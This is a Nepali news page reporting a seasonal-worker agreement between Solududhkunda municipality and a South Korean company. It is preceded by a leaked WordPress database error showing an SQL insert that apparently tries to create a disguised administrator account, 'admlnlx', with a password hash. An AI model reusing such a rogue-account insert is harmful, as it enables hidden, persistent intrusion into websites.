WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bxz5Sh8d9MMMtLQE.gUG9Orize7dqv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-13 14:11:02', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुदुधकुण्ड नगरपालिका र दक्षिण कोरियाली एक कम्पनी बीच कोरियामा मौसमी कामदार पठाउनका लागि सम्झौता गरिएको छ ।
आज मंगलबार काठमाडौँमा दोङबाङ डिएस सिस्टम कम्पनी लिमिटेडका सिइओ र सोलुदुधकुण्ड नगरपालिका प्रमुख नाम्गेल जाङबु शेर्पाले दक्षिण कोरियामा मौसमी कामदार आदानप्रदान सम्बन्धी सम्झौता पत्रमा हस्ताक्षर गरेका हुन् । स्थानीय कृषि क्षेत्रको विकास गर्न र आम्दानी वृद्धि गर्नका लागि दुवै पक्षले ५ बुँदामा सहमति जनाएका छन् ।
सम्झौता पत्रमा नगरपालिका भित्रका इच्छुक कामदारलाई कोरियामा काम गर्ने अवसर सृजना गर्ने र सोलुदुधकुण्ड नगरपालिकाले मौसमी काम समाप्त हुँदा साथ कामदार फिर्ता हुने ग्यारेन्टी लिनुपर्ने लगायतका सर्त उल्लेख गरिएको छ । सम्झौता एक वर्षको लागि कायम रहनेछ ।